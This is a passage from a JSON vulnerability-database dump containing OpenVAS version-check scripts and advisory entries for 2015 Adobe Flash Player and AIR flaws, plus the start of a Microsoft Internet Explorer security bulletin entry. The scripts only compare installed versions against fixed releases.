11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:22:46 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version\n 13.0.0.302, and 14.x through 18.x before 18.0.0.203 versions on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.302 or 18.0.0.203 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"13.0.0.302\"))\n{\n fix = \"13.0.0.302\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"18.0.0.202\"))\n{\n fix = \"18.0.0.203\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310850845", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850845", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:1211-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850845\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 12:12:54 +0200 (Thu, 15 Oct 2015)\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\",\n \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\",\n \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\",\n \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\",\n \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\",\n \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\",\n \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\",\n \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\",\n \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:1211-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1211-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.481~93.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.481~93.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-07-08T00:00:00", "id": "OPENVAS:1361412562310805902", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805902", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805902\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:07:29 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version\n 13.0.0.302, and 14.x through 18.x before 18.0.0.203 versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.302 or 18.0.0.203 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"13.0.0.302\"))\n{\n fix = \"13.0.0.302\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"18.0.0.202\"))\n{\n fix = \"18.0.0.203\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-07-09T00:00:00", "id": "OPENVAS:1361412562310805911", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805911", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities-01 July15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_jul15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities-01 July15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805911\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-09 11:35:12 +0530 (Thu, 09 Jul 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities-01 July15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 18.0.0.180 on\n Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 18.0.0.180\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"18.0.0.180\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"18.0.0.180\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3113", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "Gentoo Linux Local Security Checks GLSA 201507-13", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121394", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201507-13", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201507-13.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121394\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:56 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201507-13\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201507-13\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3113\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201507-13\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.481\"), vulnerable: make_list(\"lt 11.2.202.481\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2021-06-08T19:16:43", "bulletinFamily": "software", "cvelist": ["CVE-2014-0307", "CVE-2014-0313", "CVE-2014-0303", "CVE-2014-0322", "CVE-2014-0305", "CVE-2014-0299", "CVE-2014-0314", "CVE-2014-0306", "CVE-2014-0297", "CVE-2014-0321", "CVE-2014-0311", "CVE-2014-0304", "CVE-2014-0312", "CVE-2014-0298", "CVE-2014-0324", "CVE-2014-0308", "CVE-2014-0302", "CVE-2014-0309"], "description": "Multiple memory corruptions.", "edition": 2, "modified": "2014-03-18T00:00:00", "published": "2014-03-18T00:00:00", "id": "SECURITYVULNS:VULN:13605", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13605", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:56:57", "bulletinFamily": "software", "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-5123", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-5122", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "Multiple memory corruptions, buffer overflows, information disclosure.", "edition": 2, "modified": "2015-07-19T00:00:00", "published": "2015-07-19T00:00:00", "id": "SECURITYVULNS:VULN:14591", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14591", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:38:58", "bulletinFamily": "microsoft", "cvelist": ["CVE-2014-0307", "CVE-2014-0313", "CVE-2014-0303", "CVE-2014-0322", "CVE-2014-0305", "CVE-2014-0299", "CVE-2014-0314", "CVE-2014-0306", "CVE-2014-0297", "CVE-2014-0321", "CVE-2014-0311", "CVE-2014-0304", "CVE-2014-4112", "CVE-2014-0312", "CVE-2014-0298", "CVE-2014-0324", "CVE-2014-0308", "CVE-2014-0302", "CVE-2014-0309"], "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage in Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. We recommend that you install the most current cumulative security update for Internet Explorer. To install the most current update, go to the following Microsoft website: <div class=\"indent\"><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-1\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, go to the following Microsoft website: <div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin\" id=\"kb-link-2\" target=\"_self\">http://technet.microsoft.com/security/bulletin</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS14-012. Learn more about how to obtain the fixes that are included in this security bulletin:<br/><ul class=\"sbody-free_list\"><li>For individual, small business, and organizational users, use the Windows automatic updating feature to install the fixes from Microsoft Update. To do 